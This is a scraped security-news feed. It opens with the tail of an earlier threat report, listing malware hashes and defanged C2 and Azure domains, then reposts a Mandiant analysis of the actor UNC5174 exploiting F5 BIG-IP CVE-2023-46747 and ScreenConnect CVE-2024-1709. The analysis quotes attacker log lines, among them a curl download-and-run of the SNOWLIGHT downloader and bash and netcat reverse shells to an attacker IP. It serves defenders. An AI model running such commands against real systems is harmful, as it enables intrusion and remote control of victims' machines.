<li>
<p>710d1a8b2fc17c381a7f20da5d2d70fc</p>
</li>
<li>
<p>75d2c686d410ec1f880a6fd7a9800055</p>
</li>
<li>
<p>909a235ac0349041b38d84e9aab3f3a1</p>
</li>
<li>
<p>a5e64f196175c5f068e1352aa04bc5fa</p>
</li>
<li>
<p>adef679c6aa6860aa89b775dceb6958b</p>
</li>
<li>
<p>bfd024e64867e6ca44738dd03d4f87b5</p>
</li>
<li>
<p>c12ff86d32bd10c6c764b71728a51bce</p>
</li>
<li>
<p>cf32d73c501d5924b3c98383f53fda51</p>
</li>
<li>
<p>d94ffe668751935b19eaeb93fed1cdbe</p>
</li>
<li>
<p>e3dc8810da71812b860fc59aeadcc350</p>
</li>
<li>
<p>e9ed595b24a7eeb34ac52f57eeec6e2b</p>
</li>
<li>
<p>eadbaabe3b8133426bcf09f7102088d4</p>
</li>
</ul>
<h4>MINIBUS</h4>
<ul>
<li>
<p>ef262f571cd429d88f629789616365e4</p>
</li>
<li>
<p>816af741c3d6be1397d306841d12e206</p>
</li>
<li>
<p>c5dc2c75459dc99a42400f6d8b455250</p>
</li>
<li>
<p>05fcace605b525f1bece1813bb18a56c</p>
</li>
<li>
<p>4ed5d74a746461d3faa9f96995a1eec8</p>
</li>
<li>
<p>f58e0dfb8f915fa5ce1b7ca50c46b51b</p>
</li>
</ul>
<h4>LIGHTRAIL</h4>
<ul>
<li>
<p>0a739dbdbcf9a5d8389511732371ecb4</p>
</li>
<li>
<p>36e2d9ce19ed045a9840313439d6f18d</p>
</li>
<li>
<p>aaef98be8e58be6b96566268c163b6aa</p>
</li>
<li>
<p>c3830b1381d95aa6f97a58fd8ff3524e</p>
</li>
<li>
<p>c51bc86beb9e16d1c905160e96d9fa29</p>
</li>
<li>
<p>a5fdf55c1c50be471946de937f1e46dd</p>
</li>
</ul>
<h4>Fake Job Offers</h4>
<ul>
<li>
<p>ec6a0434b94f51aa1df76a066aa05413</p>
</li>
<li>
<p>89107ce5e27d52b9fa6ae6387138dd3e</p>
</li>
<li>
<p>4a223bc9c6096ac6bae3e7452ed6a1cd</p>
</li>
</ul>
<h4>C2 and Hosting Infrastructure</h4>
<ul>
<li>
<p>1stemployer[.]com</p>
</li>
<li>
<p>birngthemhomenow[.]co[.]il</p>
</li>
<li>
<p>cashcloudservices[.]com</p>
</li>
<li>
<p>jupyternotebookcollections[.]com</p>
</li>
<li>
<p>notebooktextcheckings[.]com</p>
</li>
<li>
<p>teledyneflir[.]com[.]de</p>
</li>
<li>
<p>vsliveagent[.]com</p>
</li>
<li>
<p>xboxplayservice[.]com</p>
</li>
</ul>
<h4>Azure Subdomains</h4>
<ul>
<li>
<p>airconnectionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>airconnectionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>airconnectionsapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>airgadgetsolution[.]azurewebsites[.]net</p>
</li>
<li>
<p>airgadgetsolutions[.]azurewebsites[.]net</p>
</li>
<li>
<p>altnametestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>answerssurveytest[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquestion[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquizapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>arquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>arquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>audiomanagerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>audioservicetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>blognewsalphaapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>blogvolleyballstatusapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>blogvolleyballstatus[.]azurewebsites[.]net</p>
</li>
<li>
<p>boeisurveyapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckap[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestionstypeapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestionstypejsonapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestiontypesapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestiontypes[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkapicountryquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkapicountryquestionsjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkservicecustomerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>coffeeonlineshop[.]azurewebsites[.]net</p>
</li>
<li>
<p>coffeeonlineshoping[.]azurewebsites[.]net</p>
</li>
<li>
<p>connectairapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>connectionhandlerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>countrybasedquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>customercareserviceapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>customercareservice[.]azurewebsites[.]net</p>
</li>
<li>
<p>emiratescheckapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>emiratescheckapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>engineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>engineeringssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>exchtestcheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>exchtestcheckingapihealth[.]azurewebsites[.]net</p>
</li>
<li>
<p>flighthelicopterahtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicopterahtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicopterahtests[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicoptersahtests[.]azurewebsites[.]net</p>
</li>
<li>
<p>hiringarabicregion[.]azurewebsites[.]net</p>
</li>
<li>
<p>homefurniture[.]azurewebsites[.]net</p>
</li>
<li>
<p>hrapplicationtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapiquiz[.]azurewebsites[.]net</p>
</li>
<li>
<p>iaidevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeed[.]centrualus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeed[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeedp[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>identifycheckapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>identifycheckapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>identifycheckingapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>ilengineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognewfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognewsapi[.]azurewebsites[.]com</p>
</li>
<li>
<p>integratedblognewsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognews[.]azurewebsites[.]net</p>
</li>
<li>
<p>intengineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>intergratedblognewsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntime[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimestestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimeversioncheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimeversionchecking[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookcollection[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookcollections[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookscollection[.]azurewebsites[.]net</p>
</li>
<li>
<p>logsapimanagement[.]azurewebsites[.]net</p>
</li>
<li>
<p>logsapimanagements[.]azurewebsites[.]net</p>
</li>
<li>
<p>logupdatemanagementapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>logupdatemanagementapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>manpowerfeedapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>manpowerfeedapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>marineblogapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktextchecking[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktextcheckings[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktexts[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestionsapicheck[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>openapplicationcheck[.]azurewebsites[.]net</p>
</li>
<li>
<p>optionalapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>personalitytestquestionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>personalizationsurvey[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionsapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>queryfindquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>queryquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationbackup[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsdatabases[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsurveyapp[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsurveyappserver[.]azurewebsites[.]net</p>
</li>
<li>
<p>quiztestapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>refaeldevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>regionuaequestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>registerinsurance[.]azurewebsites[.]net</p>
</li>
<li>
<p>roadmapselectorapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>roadmapselector[.]azurewebsites[.]net</p>
</li>
<li>
<p>sportblogs[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyappquery[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyonlinetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyonlinetest[.]azurewebsites[.]net</p>
</li>
<li>
<p>technewsblogapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapi1[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapis[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapisjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>testquestionapplicationapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>testtesttes[.]azurewebsites[.]net</p>
</li>
<li>
<p>tiappschecktest[.]azurewebsites[.]net</p>
</li>
<li>
<p>tnlsowkis[.]westus3[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>tnlsowki[.]westus3[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>turkairline[.]azurewebsites[.]net</p>
</li>
<li>
<p>uaeaircheckon[.]azurewebsites[.]net</p>
</li>
<li>
<p>uaeairchecks[.]azurewebsites[.]net</p>
</li>
<li>
<p>vscodeupdater[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestionsjson[.]azurewebsites[.]net</p>
</li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect]]></title>
<description><![CDATA[Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen

 
During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Addit...]]></description>
<link>https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a> affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.</p>
<p>Mandiant assesses UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting <a href="https://cloud.google.com/blog/topics/threat-intelligence/connectwise-screenconnect-hardening-remediation" rel="noopener" target="_blank"><u>ConnectWise ScreenConnect vulnerability</u></a> (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" rel="noopener" target="_blank"><u>CVE-2024-1709</u></a>) to compromise hundreds of institutions primarily in the U.S. and Canada.</p>
<h2>Targeting and Timeline</h2>
<p>UNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024.</p>
<p>The actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time.</p>
<ul>
<li>ConnectWise ScreenConnect Vulnerability CVE-2024-1709</li>
<li>F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747</li>
<li>Atlassian Confluence CVE-2023-22518</li>
<li>Linux Kernel Exploit CVE-2022-0185</li>
<li>Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525</li>
</ul>
<p>Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig1.max-1000x1000.jpg" alt="UNC5174 global targeting map">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8pnka">Figure 1: UNC5174 global targeting map</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Initial Disclosure of CVE-2023-46747</h2>
<p>On Oct. 25, 2023, Praetorian published an <a href="https://www.praetorian.com/blog/advisory-f5-big-ip-rce/" rel="noopener" target="_blank"><u>advisory</u></a> and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a>) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The <a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>advisory</u></a> detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.</p>
<h2>Evidence of Exploitation</h2>
<p>Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The anomalous behavior appeared first in the "<em><strong>/var/log/audit</strong></em>" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:</p>
<ul>
<li><em><strong>/etc/passwd</strong></em></li>
<li><em><strong>/etc/shadow</strong></em></li>
<li>The creation of the user's home directory was also replicated at <em><strong>/home/&lt;username&gt;</strong></em>.</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 
01420002:5: AUDIT - pid=30629 user=root folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=create 
auth user f5support3 password **** shell bash partition-access 
add { all-partitions { role admin } }

Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash -c id</code></pre>
<p><span>Table 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.</span></p></div>
<div class="block-paragraph_advanced"><p>The "<em><strong>/var/log/restjavad-audit.log</strong></em>" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "<em><strong>f5support3</strong></em>". The following log entries show the <em><strong>f5support3</strong></em> user executing bash commands. The body of the POST request contains the bash command being executed.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"POST","uri":"http://localhost:8100
/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"}

[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100
/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"}
</code></pre>
<p><span>Table 2: UNC5174 bash commands with newly created username f5support3</span></p></div>
<div class="block-paragraph_advanced"><p>UNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:</p>
<ul>
<li>F5support3</li>
<li>F5_admin</li>
<li>f5_support</li>
</ul>
<h2>Post-Exploitation Tactics by UNC5174 After Successful Account Creation</h2>
<h3>SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL</h3>
<p>UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named <u>SNOWLIGHT</u>.</p>
<p>The following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT: </p>
<ol>
<li>Delete any file previously written to /tmp/watchsys.</li>
<li>Forcefully kill the process "watchsys" if it is running.</li>
<li>Download the file from a remote URL to /tmp/watchsys.</li>
<li>Modify the permissions of /tmp/watchsys to allow execution.</li>
<li>Execute /tmp/watchsys using "nohup", so that the process will continue executing after the parent process is terminated.</li>
<li>Perform a directory listing of the /tmp directory.</li>
</ol></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:29:47 localhost.localdomain notice icrd_child[17602]: 
01420002:5: AUDIT - pid=17602 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys 
http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup 
/tmp/watchsys &amp;;ls -al /tmp/"</code></pre>
<p><span>Table 3: UNC5174 cURL command to download SNOWLIGHT downloader</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig2.max-1000x1000.png" alt="Excerpt showing SNOWLIGHT's decoding routine and memory injection method">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="kdtvq">Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>SNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&amp;C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key "0x99".</p>
<p>Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of "". This is identifiable in a running process list as a "memfd" process.</p>
<p>The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:</p>
<ul>
<li>Process Name: memfd:a (deleted)</li>
<li>Path: empty (due to the executable being un-backed)</li>
<li>Args: ?</li>
<li>User: root</li>
</ul>
<p>GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. </p>
<p>Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:16:15 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=
/Common module=(tmos)# status=[Command OK] cmd_data=run util 
bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0&gt;&amp;1 &amp;"|</code></pre>
<p><span>Table 4: UNC5174 command to download a bash web shell</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:30:37 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "nc 172.104.124[.]74 443 -e /bin/bash &amp;"</code></pre>
<p><span>Table 5: UNC5174 command to download a netcat web shell</span></p></div>
<div class="block-paragraph_advanced"><h3>Internal Reconnaissance</h3>
<p>Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx</code></pre>
<pre class="language-plain"><code>curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases
/download/v1.2.5/App-amd64linux-noupx</code></pre>
<p><span>Table 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionality</span></p></div>
<div class="block-paragraph_advanced"><p>The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of "/tmp/ss" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool <a href="https://github.com/shadow1ng/fscan" rel="noopener" target="_blank">FSCAN</a>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>./ss -i &lt;Internal CIDR block&gt;</code></pre>
<p><span>Table 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances</span></p></div>
<div class="block-paragraph_advanced"><h3>GOHEAVY Tunneler: A Closer Look</h3>
<p>UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces.</p>
<p>This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network</p>
<p>In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:</p>
<ul>
<li>SLIVER client</li>
<li>FFUFP</li>
<li>SQLMAP</li>
<li>DIRBUSTER</li>
<li>METASPLOIT</li>
<li>AFROG penetration testing tool</li>
<li>NUCLEI vulnerability scanning templates</li>
</ul>
<h3>UNC5174 Closes the Door Behind Them</h3>
<p>Mandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script "<a href="http://mitigation.sh/" rel="noopener" target="_blank"><u>mitigation.sh</u></a>". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance:</p>
<ul>
<li>bash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73</li>
<li>28/10 14:16:23 deleted user root6</li>
<li>28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u</li>
<li>4/11/2023 03:36:30 /tmp/.del</li>
</ul>
<h2>UNC5174 Targets ScreenConnect Vulnerability</h2>
<p>On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. </p>
<p>Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations.  Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig3.max-1000x1000.png" alt="Geographic distribution of UNC5174 ScreenConnect targeting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Attribution</h2>
<p>Mandiant has identified a new access operations group UNC5174 that uses the personas "Uteus" (alternate spelling "uetus") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including "Dawn Calvary" and "Genesis Day" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions.</p>
<h3>Chinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors</h3>
<p>Mandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake." This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.</p>
<p>As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously <a href="https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion" rel="noopener" target="_blank"><u>indicted</u></a> by the U.S. Department of Justice in 2020. </p>
